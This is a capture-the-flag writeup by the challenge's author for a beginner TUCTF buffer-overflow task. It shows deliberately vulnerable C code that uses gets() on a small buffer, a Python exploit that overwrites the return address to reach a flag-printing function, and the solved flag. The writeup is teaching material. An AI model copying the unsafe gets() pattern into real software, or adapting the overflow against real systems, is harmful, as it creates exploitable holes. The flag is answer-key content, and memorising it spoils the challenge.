# The First Author Writeup

## Description

Get warmed up, we'll be here for a while.

*Hint:* Notice any interesting functions lying around?

## A Word From The Author

Everyone starts somewhere and I still remember struggling like crazy on my first pwn challenge; which was of course a straight-forward buffer overflow. Just making sure the next generation gets their proper course of pwning.

## Information Gathering

``` c
#include <stdio.h>  // prints
#include <stdlib.h> // malloc
#include <string.h> // strcmp
#include <unistd.h> // read
#include <fcntl.h>  // open
#include <unistd.h> // close
#include <time.h>   // time

// ret2win
void printFlag() {
	system("/bin/cat ./flag.txt");
}

int main() {
    setvbuf(stdout, NULL, _IONBF, 20);
    setvbuf(stdin, NULL, _IONBF, 20);

	printf("Let's see what you can do\n> ");
	char buf[16];
	// gets()... classic
	gets(buf);

    return 0;
}
```

![info.png](./res/f95faa8a5456468bba3b7100ececf37c.png)

Overkill, sure. But it proves the point well. For those unfamiliar with the term *buffer overflow* or need some visual help, like I did, this link may help explain the awesomeness that is [buffer overflows](https://www.coengoedegebure.com/buffer-overflow-attacks-explained/).

TLDR on buffer overflows, you give it too much data and it's gotta put it somwhere. Looks like early software developers were more concerned with speed than hackers that didn't even exist yet.

## Exploitation

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'chal.tuctf.com 30508',
    localcmd =  './thefirst',
#    libcid =    '',
#    libcfile =  './',
    local =     True,
#    pause =     True,
#    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
p.recv()
pad = 28-4

# Addrs
printFlag = flat(elf.sym['printFlag'])
print hex(elf.sym['printFlag'])

payload = 'A'*pad
payload += printFlag

p.sendline(payload)
print p.recv()
#___________________________________________________________________________________________________
pwnend(p, args)
```

![exploit.png](./res/c37ea7f05d5642e89cb44008a229ba5c.png)

## Endgame

I'll probably reskin this challenge again next year. Maybe with some flair. Happy pwning!

> **flag:** TUCTF{0n3_d0wn..._50_m4ny_70_60}

